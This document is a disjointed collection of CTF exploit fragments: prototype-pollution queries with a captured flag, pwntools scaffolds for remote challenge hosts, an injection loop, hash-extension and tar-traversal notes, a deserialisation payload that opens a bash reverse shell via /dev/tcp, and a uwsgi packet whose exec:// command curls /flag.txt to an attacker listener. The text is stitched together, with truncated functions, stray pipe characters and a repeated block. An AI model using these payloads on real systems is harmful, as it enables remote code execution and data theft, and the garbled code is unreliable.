Chaining these two requests yields the flag.
Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__
FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}
from pwn import *

# Exploit scaffold for ./note (Harekaze). Written for Python 2 pwntools:
# str(x) there yields a byte string, so ints and strings can be sent alike.
# On Python 3 pwntools, send() of a str is encoded via context.encoding --
# NOTE(review): verify that is acceptable before porting.
e = ELF('./note')
l = e.libc                      # libc resolved from the binary's dependencies
r = process('./note')           # local run; swap for the remote() line below
#r = remote('problem.harekaze.com',20003)
#context.log_level = 'debug'


def s(x):
    """Send x (coerced through str()) without a trailing newline."""
    return r.send(str(x))


def sl(x):
    """Send x (coerced through str()) followed by a newline."""
    return r.sendline(str(x))
import requests | |
import urllib | |
import json | |
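# Percent-encoder that works on both interpreters: the script was written
# for Python 2 (urllib.quote); on Python 3 the function lives in urllib.parse.
try:
    from urllib.parse import quote
except ImportError:  # Python 2
    from urllib import quote


def url(x):
    """Build the search URL with x placed (percent-encoded) in the `limit`
    parameter -- the injection point this script drives."""
    return "http://mashiro.kr:13000/search?limit=%s" % quote(x)


cnt = 0   # request counter
pw = ''   # value recovered so far; extended by the loop that follows (body not shown here)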
for i in range(1,33): | |
tmp = 0 |
''' | |
1. Hash length extension: append to the signed value so a single valid signature covers multiple queries.
2. Header injection: strip the CSP header, after which the XSS fires.
''' | |
import hashpumpy | |
import requests | |
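import base64


def b64e(x):
    """Base64-encode x and return the result as one line of text.

    Replaces the Python 2-only ``str.encode('base64')`` codec (gone in
    Python 3), which also inserted a newline every 76 characters; this
    version emits no line breaks at all.

    A text (non-bytes) argument is encoded as latin-1 so every code point
    0-255 maps to exactly one byte, matching the Python 2 ``str`` this script
    was written for. That matters if a forged hash-extension message (which
    carries raw padding bytes such as \\x80 and \\x00) is ever passed in as
    text -- UTF-8 would mangle those bytes.
    """
    if not isinstance(x, bytes):
        x = x.encode("latin-1")
    return base64.b64encode(x).decode("ascii")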
from pwn import *

# Exploit scaffold for plane_market (AeroCTF). Python 2 pwntools idiom:
# str(x) is a byte string there, so ints and strings are sent alike.
#r = process('./plane_market')
r = remote('tasks.aeroctf.com', 33087)


def c0():
    """Read up to and including the next ':' prompt."""
    return r.recvuntil(':')


def c1():
    """Read up to and including the next '>' prompt."""
    return r.recvuntil('>')


def s(x):
    """Send x (coerced through str()) without a trailing newline."""
    return r.send(str(x))


def sl(x):
    """Send x (coerced through str()) followed by a newline."""
    return r.sendline(str(x))
#!/usr/bin/python | |
import requests | |
import os | |
import threading | |
import yaml | |
import subprocess | |
''' | |
Vulnerabilities: | |
1. Directory traversal via file upload: the upload is unpacked with tarfile's extractall(), which honours `../` in member names, so an archive member can be written into the parent (or any other) directory. extractall() on untrusted archives is unsafe unless member paths are checked first or a filter such as `filter='data'` (Python 3.12+) is applied.
Chaining these two requests yields the flag.
Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__
FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}
// CTF payload: has the shape of the TypeScript down-level helper
// __classPrivateFieldSet, plus one extra line (the console.log) that prints
// whatever private field the global `flag` object holds every time any
// private field is written. `flag` is not defined in this snippet; it is
// expected to exist wherever the helper ends up running.
var __classPrivateFieldSet = function(receiver, privateMap, value) {
    if (privateMap.has(receiver)) {
        privateMap.set(receiver, value);
        // Leak: reads the private slot of `flag`, not of `receiver`.
        console.log(privateMap.get(flag));
        return value;
    }
    throw new TypeError(
        "attempted to set private field on non-instance"
    );
};
import websockets | |
import asyncio | |
import json | |
import socket | |
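# Reverse-shell listener -- fill these in before running.
LHOST = "<host>"
LPORT = "<port>"

host = "ws://harmony-1.hackable.software:3380/chat"

# JavaScript the gadget executes on the server: a bash reverse shell to LHOST:LPORT.
_rce = (
    "console.log(global.process.mainModule.require(`child_process`)"
    ".execSync(`bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'`))" % (LHOST, LPORT)
)

# Deserialisation gadget: the "___js-to-json-class___": "Function" tag
# presumably makes the receiving side rebuild `toString` as a Function from
# the `json` source, so `_rce` runs whenever the object is stringified.
# The remaining keys are the fields of a CSP violation report, which is
# presumably what the endpoint parses -- verify against the handler.
_report = {
    "script-sample": {
        "toString": {"___js-to-json-class___": "Function", "json": _rce},
    },
    "document-uri": "a",
    "referrer": "b",
    "violated-directive": "c",
    "effective-directive": "d",
    "original-policy": "e",
    "disposition": "f",
    "blocked-uri": "g",
    "line-number": 1,
    "source-file": "1",
    "status-code": "a",
}

# Serialised from a dict so the body always parses: the hand-written literal
# this replaces ended in `}}` with no matching opener and was not valid JSON.
# NOTE(review): if the endpoint expects the standard {"csp-report": {...}}
# envelope, wrap `_report` before dumping -- TODO confirm.
payload = json.dumps(_report, separators=(",", ":"))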
def register(username): |
import requests | |
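import struct

url = "http://simplenote.chal.perfect.blue/"

# Where the flag is POSTed back to -- fill in before running.
LISTENER = "[YOUR_URL]"


def uwsgi_packet(env, modifier1=0, modifier2=0):
    """Serialise env (ordered (key, value) byte pairs) as a uwsgi packet.

    Layout: 1-byte modifier1, little-endian uint16 body size, 1-byte
    modifier2, then per pair a uint16-LE length + key and a uint16-LE
    length + value. All sizes are computed here, so the packet stays
    consistent when LISTENER or any value is edited -- the hand-packed
    original carried fixed \\x3c / \\xdc counts that silently go stale the
    moment the placeholder is replaced with a URL of a different length.
    Raises struct.error if the body or any field exceeds 65535 bytes.
    """
    body = b"".join(
        struct.pack("<H", len(k)) + k + struct.pack("<H", len(v)) + v
        for k, v in env
    )
    return struct.pack("<BHB", modifier1, len(body), modifier2) + body


# uwsgi treats an exec:// UWSGI_FILE as a command to run; this one curls
# the flag out to LISTENER.
_cmd = 'exec://curl http://%s:10101 --data "`cat /flag.txt`"' % LISTENER

_env = [
    (b"SERVER_PROTOCOL", b"HTTP/1.1"),
    (b"REQUEST_METHOD", b"GET"),
    (b"PATH_INFO", b"/"),
    (b"REQUEST_URI", b"/"),
    (b"QUERY_STRING", b""),
    (b"SERVER_NAME", b""),
    (b"HTTP_HOST", b"app:4444"),
    (b"UWSGI_FILE", _cmd.encode("ascii")),
    (b"SCRIPT_NAME", b"a"),
]
data = uwsgi_packet(_env)

# The raw uwsgi packet is posted as the HTTP body; guarded so importing
# this module does not fire the request.
if __name__ == "__main__":
    r = requests.post(url, data=data)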